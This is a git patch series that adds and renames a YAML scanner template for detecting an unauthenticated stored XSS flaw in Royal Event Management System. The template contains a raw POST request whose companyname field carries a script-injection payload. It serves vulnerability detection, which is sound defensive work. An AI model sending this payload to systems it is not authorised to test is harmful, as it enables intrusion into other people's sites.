From 679bc9198e0fbe27fa1bacd6b3c5e3bb4439aab2 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Thu, 23 Jun 2022 13:00:43 +0530
Subject: [PATCH 1/3] Create royalevent-management-xss.yaml
---
.../other/royalevent-management-xss.yaml | 30 +++++++++++++++++++
1 file changed, 30 insertions(+)
create mode 100644 vulnerabilities/other/royalevent-management-xss.yaml
diff --git a/vulnerabilities/other/royalevent-management-xss.yaml b/vulnerabilities/other/royalevent-management-xss.yaml
new file mode 100644
index 0000000000..35cb99ef0f
--- /dev/null
+++ b/vulnerabilities/other/royalevent-management-xss.yaml
@@ -0,0 +1,30 @@
+id: royalevent-management-xss
+
+info:
+ name: Royale Event - Stored Cross-site Scripting (Unauthenticated)
+ author: ritikchaddha
+ severity: high
+ description: |
+ Detects an XSS vulnerability in Royal Event System
+ reference:
+ - https://packetstormsecurity.com/files/166479/Royale-Event-Management-System-1.0-Cross-Site-Scripting.html
+ - https://www.sourcecodester.com/sites/default/files/download/oretnom23/Royal%20Event.zip
+ tags: xss,unauthenticated,cms,royalevent
+
+requests:
+ - raw:
+ - |
+ POST /royal_event/companyprofile.php HTTP/1.1
+ Host: {{Hostname}}
+
+ companyname=%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E®no=test&companyaddress=&companyemail=&country=India&mobilenumber=1234567899&submit=
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+
+ - type: status
+ status:
+ - 302
From 98034728fc405e5a70a1b24980d4d30b18659d95 Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Fri, 24 Jun 2022 00:10:24 +0530
Subject: [PATCH 2/3] Update and rename
vulnerabilities/other/royalevent-management-xss.yaml to
vulnerabilities/other/royalevent/royalevent-management-xss.yaml
---
.../other/{ => royalevent}/royalevent-management-xss.yaml | 4 +++-
1 file changed, 3 insertions(+), 1 deletion(-)
rename vulnerabilities/other/{ => royalevent}/royalevent-management-xss.yaml (90%)
diff --git a/vulnerabilities/other/royalevent-management-xss.yaml b/vulnerabilities/other/royalevent/royalevent-management-xss.yaml
similarity index 90%
rename from vulnerabilities/other/royalevent-management-xss.yaml
rename to vulnerabilities/other/royalevent/royalevent-management-xss.yaml
index 35cb99ef0f..e55b5e1137 100644
--- a/vulnerabilities/other/royalevent-management-xss.yaml
+++ b/vulnerabilities/other/royalevent/royalevent-management-xss.yaml
@@ -9,6 +9,8 @@ info:
reference:
- https://packetstormsecurity.com/files/166479/Royale-Event-Management-System-1.0-Cross-Site-Scripting.html
- https://www.sourcecodester.com/sites/default/files/download/oretnom23/Royal%20Event.zip
+ metadata:
+ verified: true
tags: xss,unauthenticated,cms,royalevent
requests:
@@ -23,7 +25,7 @@ requests:
matchers:
- type: word
words:
- - ""
+ - 'value=">" >'
- type: status
status:
From 5376bf09d35674d66423c78022da137539faeb51 Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Fri, 24 Jun 2022 00:15:44 +0530
Subject: [PATCH 3/3] Update and rename royalevent-management-xss.yaml to
royalevent-stored-xss.yaml
---
...oyalevent-management-xss.yaml => royalevent-stored-xss.yaml} | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
rename vulnerabilities/other/royalevent/{royalevent-management-xss.yaml => royalevent-stored-xss.yaml} (96%)
diff --git a/vulnerabilities/other/royalevent/royalevent-management-xss.yaml b/vulnerabilities/other/royalevent/royalevent-stored-xss.yaml
similarity index 96%
rename from vulnerabilities/other/royalevent/royalevent-management-xss.yaml
rename to vulnerabilities/other/royalevent/royalevent-stored-xss.yaml
index e55b5e1137..601e0fc7a3 100644
--- a/vulnerabilities/other/royalevent/royalevent-management-xss.yaml
+++ b/vulnerabilities/other/royalevent/royalevent-stored-xss.yaml
@@ -1,4 +1,4 @@
-id: royalevent-management-xss
+id: royalevent-stored-xss
info:
name: Royale Event - Stored Cross-site Scripting (Unauthenticated)